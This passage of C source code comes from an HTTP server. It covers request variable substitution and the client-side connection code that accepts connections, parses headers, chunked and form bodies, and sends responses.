str_secpy(buf, len, frame_string(frm), frameL(frm));
return strlen(buf);
}
return frameL(frm);
case 8: //function
if (str_casecmp(var->varname, "real_file") == 0) {
return http_real_file(obj, buf, len);
} else if (str_casecmp(var->varname, "real_path") == 0) {
return http_real_path(obj, buf, len);
}
break;
}
}
return -200;
}
static int is_var_char (int c)
{
/*if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c == '_') )
return 1;*/
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
( c >= '0' && c <= '9') || (c == '_') )
return 1;
return 0;
}
int http_var_copy (void * vmsg, char * vstr, int vlen, char * buf, int buflen,
ckstr_t * pmat, int matnum, char * lastvname, int lasttype)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPLoc * ploc = NULL;
HTTPHost * host = NULL;
HTTPListen * hl = NULL;
char vname[128];
int ret, iter = 0;
int i, len = 0, matind = 0;
int retlen = 0;
void * jobj[3];
int jobjnum = 0;
char * pbgn = NULL;
char * pend = NULL;
char * pval = NULL;
char * poct = NULL;
char * pvarend = NULL;
if (!msg) return -1;
if (!vstr) return -2;
if (vlen < 0) vlen = strlen(vstr);
if (vlen <= 0) return -3;
if (buf && buflen > 0) buf[0] = '\0';
ploc = (HTTPLoc *)msg->ploc;
host = (HTTPHost *)msg->phost;
hl = (HTTPListen *)msg->hl;
jobjnum = 0;
if (ploc) jobj[jobjnum++] = ploc->jsonobj;
if (host) jobj[jobjnum++] = host->jsonobj;
if (hl) jobj[jobjnum++] = hl->jsonobj;
pbgn = vstr;
pend = vstr + vlen;
for (iter = 0; pbgn < pend; ) {
if (buf && buflen > 0 && iter >= buflen)
break;
if (*pbgn == '$') {
if (pbgn[1] == '{') {
poct = skipToPeer(pbgn+1, pend-pbgn-1, '{', '}');
if (!poct || poct >= pend) goto docopy;
pbgn = skipOver(pbgn+2, poct-pbgn-2, " \t\r\n", 4);
if (pbgn >= poct) { pbgn = poct + 1; continue; }
/* ${ remote_addr }, or ${ query [ fid ] }, or ${1} */
pvarend = rskipOver(poct-1, poct-pbgn, " \t\r\n", 4);
str_secpy(vname, sizeof(vname)-1, pbgn, pvarend-pbgn+1);
pbgn = poct + 1;
} else {
poct = pbgn + 1;
/* variable name may be like: $1 $2 */
while (is_var_char(*poct) && poct < pend) poct++;
if (poct <= pbgn + 1) goto docopy;
/* $request_header[accept] */
if (poct < pend && *poct == '[') {
poct = skipTo(poct, pend-poct, "]", 1);
if (*poct == ']') poct++;
}
str_secpy(vname, sizeof(vname)-1, pbgn + 1, poct-pbgn-1);
pbgn = poct;
}
/* first, check if the var-string exists numeric variable pointing to the input mating array,
variable type: 1 */
ret = strlen(vname);
for (i = 0; i < ret && isdigit(vname[i]); i++);
if (i >= ret) { //all chars of variable name are digits
if (!pmat || matnum <= 0) {
pmat = msg->matchstr;
matnum = msg->matchnum;
}
if (pmat && matnum > 0) {
matind = strtol(vname, NULL, 10);
if (matind < matnum) {
if (!buf)
iter += pmat[matind].len;
else
iter += str_secpy(buf + iter, buflen - iter, pmat[matind].p, pmat[matind].len);
continue;
}
}
}
/* second, check the dynamic temporary local variables set by scripts in configuration
variable type: 2 */
if (buf && buflen > 0)
ret = http_msg_var_get(msg, vname, buf + iter, buflen - iter);
else
ret = http_msg_var_get(msg, vname, NULL, 0);
if (ret >= 0) {
iter += ret;
continue;
}
/* third, check global variables or HTTPMsg common parameters
variable type: 3 */
if (buf && buflen > 0) {
buf[iter] = '\0';
ret = http_var_value(msg, vname, buf + iter, buflen - iter);
} else {
ret = http_var_value(msg, vname, NULL, 0);
}
if (ret >= 0) iter += ret;
/* at last, check the variables defined in Location, Host, Listen
variable type: 4 */
if (lastvname && strcasecmp(vname, lastvname) == 0 && lasttype == 4)
continue;;
for (ret = 0, i = 0; i < jobjnum; i++) {
ret = json_mgetP(jobj[i], vname, strlen(vname), (void **)&poct, &len);
if (ret > 0) {
if (strncasecmp(poct, "<script>", 8) == 0) {
http_script_segment_exec(msg, poct, len, &pval, &retlen, vname, 4);
if (buf) {
if (pval && retlen > 0)
iter += str_secpy(buf + iter, buflen-iter, pval, retlen);
} else {
iter += retlen;
}
if (pval) kfree(pval);
break;
} else {
/* how to solve the recursive parsing is a problem.
$root = $root$path$fid$fileext; */
if (buf)
ret = http_var_copy(msg, poct, len, buf+iter, buflen-iter, NULL, 0, vname, 4);
else
ret = http_var_copy(msg, poct, len, NULL, 0, NULL, 0, vname, 4);
if (ret > 0) {
iter += ret;
break;
}
}
}
}
continue;
}
docopy:
if (buf && buflen > 0) {
buf[iter++] = *pbgn++;
} else {
iter++; pbgn++;
}
}
if (buf && buflen > 0) buf[iter] = '\0';
return iter;
}
void http_var_print (void * vmsg, char * varn, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
http_var_t * var = NULL;
char vname[64];
char buf[4096];
int i = 0;
if (!msg) return;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return;
var = (http_var_t *)mgmt->variable;
if (varn) {
http_var_copy(msg, varn, len, buf, sizeof(buf)-1, NULL, 0, NULL, 0);
printf("%s = %s\n", varn, buf);
return;
}
for (i = 0; i < mgmt->varnum; i++) {
sprintf(vname, "$%s", var[i].varname);
http_var_copy(msg, vname, strlen(vname), buf, sizeof(buf)-1, NULL, 0, NULL, 0);
printf("%-3d $%s = %s\n", i, var[i].varname, buf);
}
}
int http_var_header_value (void * vmsg, int type, char * name, int namelen, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
if (!msg) return -1;
punit = http_header_get(msg, type, name, namelen);
if (!punit) return -2;
if (buf && len > 0) {
str_secpy(buf, len, HUValue(punit), punit->valuelen);
return strlen(buf);
}
return punit->valuelen;
}
int http_var_cookie_value (void * vmsg, char * name, int namelen, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
if (!msg) return -1;
if (name && namelen < 0) namelen = strlen(name);
if (!name || namelen <= 0) {
if (buf && len > 0) {
return str_secpy(buf, len, msg->req_cookie, msg->req_cookie_len);
}
return msg->req_cookie_len;
}
punit = http_req_getcookie(msg, name, namelen);
if (!punit) return -2;
if (buf && len > 0) {
str_secpy(buf, len, HUValue(punit), punit->valuelen);
return strlen(buf);
}
return punit->valuelen;
}
int http_var_query_value (void * vmsg, char * name, int namelen, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pval = NULL;
int vlen = 0;
char tmpbuf[64];
int seq = 0;
if (!msg) return -1;
if (!msg->req_query_kvobj) return -2;
if (name && namelen < 0) namelen = strlen(name);
if (!name || namelen <= 0) {
if (buf && len > 0) {
return str_secpy(buf, len, msg->req_query, msg->req_querylen);
}
return msg->req_querylen;
}
if (kvpair_getP(msg->req_query_kvobj, name, namelen, 0, (void **)&pval, &vlen) <= 0) {
if (isdigit(*name)) {
str_secpy(tmpbuf, sizeof(tmpbuf)-1, name, namelen);
seq = strtol(tmpbuf, NULL, 10);
if (kvpair_seq_get(msg->req_query_kvobj, seq, 0, (void **)&pval, &vlen) <= 0) {
return -12;
}
} else {
return -12;
}
}
if (buf && len > 0) {
str_secpy(buf, len, pval, vlen);
return strlen(buf);
}
return vlen;
}
int http_var_datetime_value(void * vmsg, char * name, int namelen, char * buf, int len, int type)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
struct tm st;
time_t curt;
if (!msg) return -1;
if (name && namelen == 10 && strncasecmp(name, "createtime", 10) == 0)
curt = msg->createtime;
else if (name && namelen == 5 && strncasecmp(name, "stamp", 5) == 0)
curt = msg->stamp;
else
curt = time(0);
st = *localtime(&curt);
if (type == 6) {
if (name && namelen == 7 && strncasecmp(name, "compact", 7) == 0) {
if (buf && len >= 8)
sprintf(buf, "%04d%02d%02d", st.tm_year+1900, st.tm_mon+1, st.tm_mday);
}
if (buf && len >= 10)
sprintf(buf, "%04d-%02d-%02d", st.tm_year+1900, st.tm_mon+1, st.tm_mday);
return 10;
} else if (type == 7) {
if (buf && len >= 8)
sprintf(buf, "%02d:%02d:%02d", st.tm_hour, st.tm_min, st.tm_sec);
return 8;
} else {
if (buf && len >= 19)
sprintf(buf, "%04d-%02d-%02d %02d:%02d:%02d",
st.tm_year+1900, st.tm_mon+1, st.tm_mday,
st.tm_hour, st.tm_min, st.tm_sec);
return 19;
}
return 0;
}
void * var_obj_alloc()
{
var_obj_t * obj = NULL;
obj = kzalloc(sizeof(*obj));
if (!obj) return NULL;
return obj;
}
void var_obj_free (void * vobj)
{
var_obj_t * obj = (var_obj_t *)vobj;
if (!obj) return;
if (obj->name) kfree(obj->name);
if (obj->value) kfree(obj->value);
kfree(obj);
}
int var_obj_cmp_name (void * a, void * b)
{
var_obj_t * obj = (var_obj_t *)a;
char * name = (char *)b;
if (!obj) return -1;
if (!name) return 1;
return str_casecmp(obj->name, name);
}
<|start_filename|>src/http_cli_io.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_con.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_pump.h"
#include "http_cli_io.h"
#include "http_listen.h"
#include "http_request.h"
#include "http_handle.h"
#include "http_proxy.h"
#include "http_srv.h"
#include "http_chunk.h"
#include "http_ssl.h"
#include "http_variable.h"
#include "http_form.h"
#include "http_cache.h"
#include "http_cc.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_con.h"
#include "http_fcgi_io.h"
int http_cli_con_crash (void * vcon, int closelad)
{
HTTPCon * clicon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * climsg = NULL;
HTTPMsg * srvmsg = NULL;
HTTPCon * srvcon = NULL;
FcgiSrv * cgisrv = NULL;
FcgiMsg * cgimsg = NULL;
FcgiCon * cgicon = NULL;
if (!clicon) return -1;
mgmt = (HTTPMgmt *)clicon->mgmt;
if (!mgmt) return -2;
climsg = http_con_msg_first(clicon);
if (!closelad || !climsg)
return http_con_close(clicon);
if (climsg->proxied == 1 && (srvmsg = climsg->proxymsg)) {
srvcon = http_mgmt_con_get(mgmt, srvmsg->conid);
if (srvcon)
http_con_close(srvcon);
}
else if (climsg->fastcgi == 1 && (cgimsg = climsg->fcgimsg)) {
cgisrv = (FcgiSrv *)cgimsg->srv;
cgicon = http_fcgisrv_con_get(cgisrv, cgimsg->conid);
if (cgicon)
http_fcgicon_close(cgicon);
}
else if (clicon->httptunnel && clicon->tunnelcon) {
http_con_close(clicon->tunnelcon);
}
return http_con_close(clicon);
}
int http_cli_accept (void * vmgmt, void * listendev)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
int ret = 0;
void * pdev = NULL;
HTTPListen * hl = NULL;
if (!mgmt) return -1;
hl = iodev_para(listendev);
if (!hl) return -2;
while (1) {
pdev = eptcp_accept(mgmt->pcore, listendev,
(void *)NULL, &ret,
http_pump, mgmt, BIND_NONE);
if (pdev == NULL) {
return 0;
}
pcon = http_con_fetch(mgmt);
if (!pcon) {
iodev_close(pdev);
return -100;
}
pcon->pdev = pdev;
iodev_para_set(pdev, (void *)pcon->conid);
pcon->hl = hl;
pcon->casetype = HTTP_SERVER;
pcon->reqdiag = hl->reqdiag;
pcon->reqdiagobj = hl->reqdiagobj;
pcon->ssl_link = hl->ssl_link;
str_cpy(pcon->srcip, iodev_rip(pcon->pdev));
str_cpy(pcon->dstip, iodev_lip(pcon->pdev));
pcon->srcport = iodev_rport(pcon->pdev);
pcon->dstport = iodev_lport(pcon->pdev);
pcon->createtime = time(&pcon->stamp);
pcon->transbgn = pcon->stamp;
pcon->rcv_state = HTTP_CON_READY;
pcon->snd_state = HTTP_CON_SEND_READY;
#ifdef HAVE_OPENSSL
if (pcon->ssl_link) {
pcon->sslctx = http_listen_ssl_ctx_get(hl);
pcon->ssl = http_ssl_new(pcon->sslctx, pcon);
pcon->ssl_handshaked = 0;
pcon->rcv_state = HTTP_CON_SSL_HANDSHAKING;
}
#endif
if (pcon->life_timer)
iotimer_stop(pcon->life_timer);
/* the upcoming R/W events from pcon and the timeout event of life_timer will
pipelined to delivered to current thread. it seems to degrade the efficiency
of multiple CPU concurrent execution. but it lowers the risk of blocking/contention
from locks */
pcon->life_timer = iotimer_start(mgmt->pcore,
mgmt->conn_check_interval * 1000,
t_http_cli_con_life, (void *)pcon->conid,
http_pump, mgmt);
iodev_bind_epump(pdev, BIND_CURRENT_EPUMP, NULL);
}
return 0;
}
int http_cli_recv (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
ulong conid = 0;
int ret = 0, num = 0;
int err = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* If the receiving speed of client side is greater than the sending
speed of server side, a great deal of data will be piled up in memory.
Congestion control should be activated by neglecting the read-ready event.
After that, receving buffer of underlying TCP will be full soon.
TCP stack will start congestion control mechanism */
if (http_cli_recv_cc(pcon) > 0)
return 0;
conid = pcon->conid;
while (1) {
ret = http_con_read(pcon, pcon->rcvstream, &num, &err);
if (ret < 0) {
http_cli_con_crash(pcon, 1);
return -100;
}
time(&pcon->stamp);
if (pcon->read_ignored > 0)
pcon->read_ignored = 0;
if (num > 0) {
http_overhead_recv(mgmt, num);
} else if (frameL(pcon->rcvstream) <= 0) {
/* no data in socket and rcvstream, just return and
wait for Read-Ready notify */
return 0;
}
num = frameL(pcon->rcvstream);
if (pcon->httptunnel && pcon->tunnelself == 0) {
ret = http_tunnel_srv_send(pcon, pcon->tunnelcon);
if (ret < 0) {
http_con_close(pcon->tunnelcon);
http_con_close(pcon);
}
return ret;
}
ret = http_cli_recv_parse(pcon);
if (ret < 0) {
http_cli_con_crash(pcon, 1);
return ret;
} else if (ret == 0) {
return 0;
} else {
/* pcon->msg stores current receiving msg instance.
pcon may have multiple msg instances being handled by
callback function before the msg.
*/
/* msg = http_con_msg_last(pcon); */
msg = pcon->msg;
pcon->msg = NULL;
if (!msg) continue;
if (msg && msg->proxied == 0) {
http_msg_handle(pcon, msg);
if (http_mgmt_con_get(mgmt, conid) != pcon)
return 0;
}
}
} //end while (1)
return 0;
}
/* return value:
* -1 : invalid entry augument
* -101 : no HTTPMsg instance exists while waiting body
* -102 : parsing body failed while waiting body
* -103 : HTTPMsg body-flag indicates no body but acutally in waiting body state
* -104 : request header is too large, possibly a malicious attack
* -105 : HTTPMsg allocate failed
* -106 : parse reqest header failed while waiting header
* -107 : parsing body failed while waiting header
* -108 : HTTPMsg body-flag invalid or error
* 0 : only partial request got, need to wait for more data
* 1 : complete HTTP-Request with body data parsed successfully
* 2 : complete HTTP-Request without body data parsed successfully
*/
int http_cli_recv_parse (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
HTTPMgmt * mgmt = NULL;
int ret = 0;
long num = 0;
int64 hdrlen = 0;
uint8 * pbyte = NULL;
uint8 * pbgn = NULL;
char buf[2048];
HTTPMsg * proxymsg = NULL;
FcgiMsg * cgimsg = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
num = frameL(pcon->rcvstream);
if (num <= 0) {
return 0;
}
if (pcon->rcv_state == HTTP_CON_READY) {
pcon->rcv_state = HTTP_CON_WAITING_HEADER;
}
if (pcon->rcv_state == HTTP_CON_WAITING_BODY) {
/* msg assignments as following 2 methods are right */
/* msg = http_con_msg_first(pcon); */
msg = pcon->msg;
if (!msg) {
return -101;
}
msg->stamp = time(0);
/* if the msg is proxied for the client msg, call proxy_srv_send */
if (msg->proxied) {
proxymsg = msg->proxymsg;
if (proxymsg && proxymsg->pcon)
http_proxy_srv_send(proxymsg->pcon, proxymsg);
return 0;
} else if (msg->fastcgi) {
cgimsg = msg->fcgimsg;
if (cgimsg && cgimsg->pcon)
http_fcgi_srv_send(cgimsg->pcon, cgimsg);
return 0;
}
switch (msg->req_body_flag) {
case BC_CONTENT_LENGTH:
case BC_TE:
ret = http_cli_reqbody_parse(pcon, msg);
if (ret < 0) {
return -102;
} else if (ret == 0) { //waiting more body
pcon->rcv_state = HTTP_CON_WAITING_BODY;
} else {
pcon->rcv_state = HTTP_CON_READY;
return 1;
}
break;
default:
return -103;
}
} else {
pbgn = frameP(pcon->rcvstream);
/* determine if http header got completely */
pbyte = kmp_find_bytes(pbgn, num, "\r\n\r\n", 4, NULL);
if (!pbyte) {
if (num > mgmt->cli_max_header_size) {
/* request header is too large, possibly a malicious attack */
return -104;
}
pcon->rcv_state = HTTP_CON_WAITING_HEADER;
return 0;
}
hdrlen = pbyte + 4 - pbgn;
pcon->msg = msg = http_msg_fetch(mgmt);
if (!msg) {
return -105;
}
msg->msgtype = 1; //receiving request
pcon->reqnum++;
msg->pcon = pcon;
msg->hl = pcon->hl;
msg->conid = pcon->conid;
strcpy(msg->srcip, pcon->srcip);
strcpy(msg->dstip, pcon->dstip);
msg->srcport = pcon->srcport;
msg->dstport = pcon->dstport;
msg->ssl_link = pcon->ssl_link;
msg->state = HTTP_MSG_REQUEST_RECVING;
msg->req_header_length = hdrlen;
if (hdrlen > 0) {
/* remove the last 2 trailer "\r\n" */
frame_put_nlast(msg->req_header_stream, pbgn, hdrlen-2);
frame_del_first(pcon->rcvstream, hdrlen);
}
msg->req_stream_recv += hdrlen;
ret = http_req_parse_header(msg);
if (ret < 0) return -106;
/* request-line contains path/query only, uri doesn't include scheme/host
* adjust it from Host header to form one complete uri */
http_req_set_absuri(msg);
/* add to the msg queue of current HTTPCon for pipeline handling or tracing */
http_con_msg_add(pcon, msg);
pcon->keepalive = msg->req_conn_keepalive;
if (http_req_verify(msg) < 0) {
return -116;
}
/* set DocURI and match the request path with configured Host and Location */
if (msg->req_url_type == 0 && msg->req_methind != HTTP_METHOD_CONNECT) { //CONNECT method
http_req_set_docuri(msg, frameP(msg->uri->uri), frameL(msg->uri->uri), 0, 0);
}
/* if set the check callback, all requests including proxy mode will be checked */
if (mgmt->req_check) {
msg->GetRealFile(msg, buf, sizeof(buf)-1);
(*mgmt->req_check)(mgmt->req_checkobj, msg, buf);
}
/* determine if request body is following, set the rcv_state of HTTPCon */
if ( ( msg->req_body_flag == BC_CONTENT_LENGTH &&
msg->req_body_length > 0 ) ||
msg->req_body_flag == BC_TE)
{
pcon->rcv_state = HTTP_CON_WAITING_BODY;
} else {
pcon->rcv_state = HTTP_CON_READY;
}
#if defined _DEBUG
print_request(msg, stdout);
#endif
if (http_proxy_handle(msg) >= 0)
return 0;
if (http_fcgi_handle(msg) >= 0)
return 0;
return http_reqbody_handle(msg);
}
return 0;
}
int http_reqbody_handle (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPCon * pcon = NULL;
int ret = 0;
if (!msg) return -1;
pcon = (HTTPCon *)msg->pcon;
if (!pcon) return -2;
/* HTTP POST/PUT request body may be encoded as following enctype:
(1) application/x-www-form-urlencoded
(2) multipart/form-data
(3) application/json
(4) text/xml
(5) application/octet-stream
*/
switch (msg->req_body_flag) {
case BC_CONTENT_LENGTH:
case BC_TE:
ret = http_cli_reqbody_parse(pcon, msg);
if (ret < 0) {
return -107;
} else if (ret == 0) { //waiting more body
pcon->rcv_state = HTTP_CON_WAITING_BODY;
} else {
pcon->rcv_state = HTTP_CON_READY;
return 1;
}
break;
case BC_TE_INVALID:
case BC_UNKNOWN:
return -108;
case BC_NONE:
case BC_TUNNEL:
default:
pcon->rcv_state = HTTP_CON_READY;
return 2;
break;
}
return 0;
}
int http_cli_reqbody_parse (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
char * pbody = NULL;
int bodylen = 0;
int64 restlen = 0;
int ret, rmlen = 0;
if (!pcon) return -1;
if (!msg) return -2;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -3;
pbody = frameP(pcon->rcvstream);
bodylen = frameL(pcon->rcvstream);
switch (msg->req_body_flag) {
case BC_CONTENT_LENGTH:
restlen = msg->req_body_length - msg->req_body_iolen;
if (bodylen >= restlen)
bodylen = restlen;
if (mgmt->cli_body_cache &&
msg->req_body_length >= mgmt->cli_body_cache_threshold &&
!msg->req_file_handle)
{
http_request_cache_init(msg);
if (msg->req_file_handle) {
frame_filefd_write(msg->req_body_stream, native_file_fd(msg->req_file_handle), 0);
frame_empty(msg->req_body_stream);
}
}
if (msg->req_file_cache && msg->req_file_handle) {
native_file_write(msg->req_file_handle, pbody, bodylen);
} else {
frame_put_nlast(msg->req_body_stream, pbody, bodylen);
}
frame_del_first(pcon->rcvstream, bodylen);
msg->req_body_iolen += bodylen;
msg->req_stream_recv += bodylen;
if (msg->req_body_iolen >= msg->req_body_length) {
goto gotallbody;
}
return 0;
case BC_TE:
/* Chunk format as following:
* 24E5CRLF #chunk-sizeCRLF (first chunk begin)
* 24E5(byte)CRLF #(chunk-size octet)CRLF
* 38A1CRLF #chunk-sizeCRLF (another chunk begin)
* 38A1(byte)CRLF #(chunk-size octet)CRLF
* ...... #one more chunks may be followed
* 0CRLF #end of all chunks
* X-bid-for: abcCRLF #0-more HTTP Headers as entity header
* ..... #one more HTTP headers with trailing CRLF
* CRLF
*/
if (http_chunk_gotall(msg->req_chunk))
return 1;
ret = http_chunk_add_bufptr(msg->req_chunk, pbody, bodylen, &rmlen);
if (ret < 0) return -30;
msg->req_chunk_iolen += chunk_rest_size(http_chunk_obj(msg->req_chunk), 0);
msg->req_body_length += chunk_rest_size(http_chunk_obj(msg->req_chunk), 0);
if (mgmt->cli_body_cache &&
msg->req_body_length >= mgmt->cli_body_cache_threshold &&
!msg->req_file_handle)
{
http_request_cache_init(msg);
if (msg->req_file_handle) {
frame_filefd_write(msg->req_body_stream, native_file_fd(msg->req_file_handle), 0);
frame_empty(msg->req_body_stream);
}
}
if (msg->req_file_handle) {
chunk_readto_file(http_chunk_obj(msg->req_chunk), native_file_fd(msg->req_file_handle), 0, -1, 0);
} else {
chunk_readto_frame(http_chunk_obj(msg->req_chunk), msg->req_body_stream, 0, -1, 0);
}
chunk_remove(http_chunk_obj(msg->req_chunk), msg->req_body_length, 0);
msg->req_stream_recv += rmlen;
if (rmlen > 0)
frame_del_first(pcon->rcvstream, rmlen);
if (http_chunk_gotall(msg->req_chunk)) {
goto gotallbody;
}
return 0;
default:
return -10;
}
return 0;
gotallbody:
if (msg->req_file_handle) {
chunk_add_filefd(msg->req_body_chunk,
native_file_fd(msg->req_file_handle),
0, -1);
} else {
chunk_add_bufptr(msg->req_body_chunk,
frameP(msg->req_body_stream),
frameL(msg->req_body_stream), NULL);
}
http_form_multipart_parse(msg, NULL);
if (msg->req_content_type && msg->req_contype_len > 0) {
if (strncasecmp(msg->req_content_type, "application/x-www-form-urlencoded", 33) == 0) {
if (!msg->req_form_kvobj) {
msg->req_form_kvobj = kvpair_init(37, "&", "=");
}
chunk_ptr(msg->req_body_chunk, 0, NULL, (void **)&pbody, &restlen);
kvpair_decode(msg->req_form_kvobj, pbody, restlen);
} else if (strncasecmp(msg->req_content_type, "application/json", 16) == 0) {
if (!msg->req_form_json) {
msg->req_form_json = json_init(0, 0, 0);
}
chunk_ptr(msg->req_body_chunk, 0, NULL, (void **)&pbody, &restlen);
json_decode(msg->req_form_json, pbody, restlen, 1, 0);
}
}
return 1;
}
int http_cli_send_probe (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
int num = 0;
if (!pcon) return -1;
if (pcon->snd_state < HTTP_CON_SEND_READY) return -100;
num = arr_num(pcon->msg_list);
if (num <= 0) {
if (pcon->snd_state == HTTP_CON_FEEDING)
pcon->snd_state = HTTP_CON_SEND_READY;
return 0;
}
msg = (HTTPMsg *)arr_value(pcon->msg_list, 0);
if (!msg || msg->issued <= 0) {
if (pcon->snd_state == HTTP_CON_FEEDING)
pcon->snd_state = HTTP_CON_SEND_READY;
return 0;
}
if (pcon->snd_state == HTTP_CON_FEEDING) {
return 0;
}
iodev_add_notify(pcon->pdev, RWF_WRITE);
return 0;
}
int http_cli_send (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
void * chunk = NULL;
chunk_vec_t iovec;
uint8 httpchunk = 0;
int ret = 0;
int64 filepos = 0;
int64 sentnum = 0;
int num = 0;
int err = 0;
uint8 shutdown = 0;
uint8 closecon = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
if (pcon->snd_state < HTTP_CON_SEND_READY)
return -100;
if (pcon->httptunnel && pcon->tunnelself == 0 && arr_num(pcon->msg_list) <= 0)
return http_tunnel_cli_send(pcon->tunnelcon, pcon);
if (pcon->snd_state == HTTP_CON_FEEDING)
return 0;
pcon->snd_state = HTTP_CON_FEEDING;
while (arr_num(pcon->msg_list) > 0 &&
pcon->snd_state == HTTP_CON_FEEDING)
{
msg = http_con_msg_first(pcon);
if (!msg) {
pcon->snd_state = HTTP_CON_SEND_READY;
break;
}
if (msg->proxied && (!msg->cacheon || !msg->res_cache_info)) {
httpchunk = 0;
} else {
httpchunk = msg->res_body_flag == BC_TE ? 1 : 0;
}
chunk = msg->res_body_chunk;
filepos = msg->res_stream_sent;
if (msg->issued <= 0 || chunk_get_end(chunk, filepos, httpchunk)) {
/* when the callback of http request not finished handling,
or the reponse has been sent to client, just do nothing and return */
pcon->snd_state = HTTP_CON_SEND_READY;
return 0;
}
if (chunk_has_file(chunk) > 0) {
if (iodev_tcp_nodelay(pcon->pdev) == TCP_NODELAY_SET) {
iodev_tcp_nodelay_set(pcon->pdev, TCP_NODELAY_UNSET);
}
if (iodev_tcp_nopush(pcon->pdev) == TCP_NOPUSH_UNSET) {
iodev_tcp_nopush_set(pcon->pdev, TCP_NOPUSH_SET);
}
}
for (sentnum = 0; chunk_get_end(chunk, filepos, httpchunk) == 0; ) {
memset(&iovec, 0, sizeof(iovec));
ret = chunk_vec_get(chunk, filepos, &iovec, httpchunk);
if (ret < 0 || (iovec.size > 0 && iovec.vectype != 1 && iovec.vectype != 2)) {
pcon->snd_state = HTTP_CON_IDLE;
http_cli_con_crash(pcon, 1);
return ret;
}
if (iovec.size == 0) {
/* no available data to send, waiting for more data... */
pcon->snd_state = HTTP_CON_SEND_READY;
/* all octets in buffer are sent to client and de-congesting process
should be started. connection of server-side is checked to add Read notification
if it's removed before */
http_cli_send_cc(pcon);
if (msg->cacheon && msg->res_cache_info) {
/* read cache file again, if no data in cache file, request it from origin */
return http_proxy_cli_cache_send(pcon, msg);
}
return 0;
}
err = 0;
if (iovec.vectype == 2) { //sendfile
#if defined(_WIN32) || defined(_WIN64)
ret = http_con_sendfile(pcon, (int)iovec.filefd, iovec.fpos, iovec.size , &num, &err);
#else
ret = http_con_sendfile(pcon, iovec.filefd, iovec.fpos, iovec.size , &num, &err);
#endif
if (ret < 0) {
shutdown = 1;
}
} else if (iovec.vectype == 1) { //mem buffer, writev
ret = http_con_writev(pcon, iovec.iovs, iovec.iovcnt, &num, &err);
if (ret < 0) {
shutdown = 1;
}
}
filepos += num;
msg->res_stream_sent += num;
sentnum += num;
http_overhead_sent(pcon->mgmt, num);
msg->stamp = time(&pcon->stamp);
/* remove the sent ChunkEntity-es in msg->res_body_chunk.
release the already sent frame objects holding received data from
origin server for zero-copy purpose. */
http_cli_send_final(msg);
if (shutdown) break;
#ifdef UNIX
if (err == EINTR || err == EAGAIN || err == EWOULDBLOCK) { //EAGAIN
#elif defined(_WIN32) || defined(_WIN64)
if (err == WSAEWOULDBLOCK) {
#else
if (num == 0) {
#endif
pcon->snd_state = HTTP_CON_SEND_READY;
iodev_add_notify(pcon->pdev, RWF_WRITE);
/* all octets in buffer are sent to client and de-congesting process
should be started. connection of server-side is checked to add Read notification
if it's removed before */
if (sentnum > 0)
http_cli_send_cc(pcon);
return 0;
}
}
if (chunk_get_end(chunk, msg->res_stream_sent, httpchunk) == 1) {
if (msg->res_status >= 400)
closecon++;
if (msg->req_ver_major < 1 || (msg->req_ver_major == 1 && msg->req_ver_minor == 0))
closecon++;
/* send response to client successfully */
http_con_msg_del(pcon, msg);
http_msg_close(msg);
pcon->transbgn = time(NULL);
/* go on sending another HTTPMsg */
}
if (shutdown) {
pcon->snd_state = HTTP_CON_IDLE;
http_cli_con_crash(pcon, 1);
return ret;
}
} //end while
if (closecon) {
pcon->snd_state = HTTP_CON_IDLE;
http_cli_con_crash(pcon, 1);
return ret;
}
pcon->snd_state = HTTP_CON_SEND_READY;
/* the response has been sent to client. the current HTTPCon
* should send the next HTTPMsg in the FIFO queue. */
if (arr_num(pcon->msg_list) > 0) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
}
return 0;
}
int http_cli_send_final (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
frame_p frm = NULL;
int i, num;
int fnum = 0;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
fnum = chunk_remove(msg->res_body_chunk,
msg->res_stream_sent,
msg->res_body_flag == BC_TE ? 1 : 0);
if (fnum <= 0)
return 0;
num = arr_num(msg->res_rcvs_list);
for (i = 0; i < num; i++) {
frm = arr_value(msg->res_rcvs_list, i);
fnum = chunk_bufptr_porig_find(msg->res_body_chunk, frm);
if (fnum <= 0) {
